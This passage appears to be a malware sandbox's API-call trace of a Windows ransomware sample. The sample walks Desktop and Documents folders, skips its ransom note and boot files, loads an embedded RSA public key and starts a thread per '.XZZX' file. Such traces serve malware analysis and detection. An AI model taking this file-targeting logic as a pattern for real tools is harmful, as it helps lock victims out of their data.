HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0228.893] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0228.893] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0228.893] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0228.893] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0228.893] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0228.893] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0228.893] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0228.893] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0228.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0228.893] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0228.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0228.893] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0228.893] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0228.893] lstrcpyW (in: lpString1=0x17b430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0228.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0228.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0228.893] SetErrorMode (uMode=0x1) returned 0x1 [0228.893] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0228.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0228.893] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0228.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0228.894] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cded18 [0228.894] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0228.894] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0228.894] StrStrW (lpFirst="19D6B3C6392F4722787D5AB33BCA2B6A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.894] StrStrW (lpFirst="19D6B3C6392F4722787D5AB33BCA2B6A.XZZX", lpSrch="ntldr") returned 0x0 [0228.894] StrStrW (lpFirst="19D6B3C6392F4722787D5AB33BCA2B6A.XZZX", lpSrch="NTLDR") returned 0x0 [0228.894] StrStrW (lpFirst="19D6B3C6392F4722787D5AB33BCA2B6A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.894] StrStrW (lpFirst="19D6B3C6392F4722787D5AB33BCA2B6A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.894] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0228.894] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0228.894] lstrcmpW (lpString1="BB5A0C7C1DC2FD429FB87666206DE18A.XZZX", lpString2="..") returned 1 [0228.894] lstrcmpW (lpString1="BB5A0C7C1DC2FD429FB87666206DE18A.XZZX", lpString2=".") returned 1 [0228.894] StrStrW (lpFirst="BB5A0C7C1DC2FD429FB87666206DE18A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.894] StrStrW (lpFirst="BB5A0C7C1DC2FD429FB87666206DE18A.XZZX", lpSrch="ntldr") returned 0x0 [0228.894] StrStrW (lpFirst="BB5A0C7C1DC2FD429FB87666206DE18A.XZZX", lpSrch="NTLDR") returned 0x0 [0228.894] StrStrW (lpFirst="BB5A0C7C1DC2FD429FB87666206DE18A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.894] StrStrW (lpFirst="BB5A0C7C1DC2FD429FB87666206DE18A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.894] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0228.894] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0228.894] lstrcmpW (lpString1="ED641CAF2D7EC8F4296430333019AD3C.XZZX", lpString2="..") returned 1 [0228.894] lstrcmpW (lpString1="ED641CAF2D7EC8F4296430333019AD3C.XZZX", lpString2=".") returned 1 [0228.894] StrStrW (lpFirst="ED641CAF2D7EC8F4296430333019AD3C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.894] StrStrW (lpFirst="ED641CAF2D7EC8F4296430333019AD3C.XZZX", lpSrch="ntldr") returned 0x0 [0228.894] StrStrW (lpFirst="ED641CAF2D7EC8F4296430333019AD3C.XZZX", lpSrch="NTLDR") returned 0x0 [0228.894] StrStrW (lpFirst="ED641CAF2D7EC8F4296430333019AD3C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.894] StrStrW (lpFirst="ED641CAF2D7EC8F4296430333019AD3C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.894] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0228.894] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0228.894] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0228.894] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0228.894] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0228.894] FindNextFileW (in: hFindFile=0x3cded18, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0228.894] FindClose (in: hFindFile=0x3cded18 | out: hFindFile=0x3cded18) returned 1 [0228.895] FindClose (in: hFindFile=0x3cded18 | out: hFindFile=0x3cded18) returned 0 [0228.895] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0228.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0228.895] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0228.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3cded18 [0228.895] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0228.895] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0228.895] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0228.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0228.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0228.895] SetErrorMode (uMode=0x1) returned 0x1 [0228.895] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0228.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0228.895] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0228.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0228.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0228.895] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0228.896] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0228.896] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.896] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="ntldr") returned 0x0 [0228.896] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="NTLDR") returned 0x0 [0228.896] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.896] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0228.896] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0228.896] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0228.896] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.896] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0228.896] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0228.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1100 [0228.896] Sleep (dwMilliseconds=0x96) [0229.044] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0229.044] lstrcmpW (lpString1="2FFB243E16646FF464F688111A91543C.XZZX", lpString2="..") returned 1 [0229.044] lstrcmpW (lpString1="2FFB243E16646FF464F688111A91543C.XZZX", lpString2=".") returned 1 [0229.044] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0229.045] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="ntldr") returned 0x0 [0229.045] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="NTLDR") returned 0x0 [0229.045] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0229.045] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0229.045] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0229.045] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0229.045] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0229.045] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.045] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0229.045] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1104 [0229.045] Sleep (dwMilliseconds=0x96) [0229.201] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0229.201] lstrcmpW (lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpString2="..") returned 1 [0229.201] lstrcmpW (lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpString2=".") returned 1 [0229.201] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0229.201] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="ntldr") returned 0x0 [0229.201] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="NTLDR") returned 0x0 [0229.202] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0229.202] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0229.202] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0229.202] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0229.202] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0229.202] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.202] lstrcpyW (in: lpString1=0x17cf1c, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0229.202] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.202] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1108 [0229.202] Sleep (dwMilliseconds=0x96) [0229.356] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0229.356] lstrcmpW (lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpString2="..") returned 1 [0229.357] lstrcmpW (lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpString2=".") returned 1 [0229.357] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0229.357] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="ntldr") returned 0x0 [0229.357] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="NTLDR") returned 0x0 [0229.357] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0229.357] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="ntdetect.com") returned 0x0 [0229.357] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0229.357] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0229.357] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0229.357] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 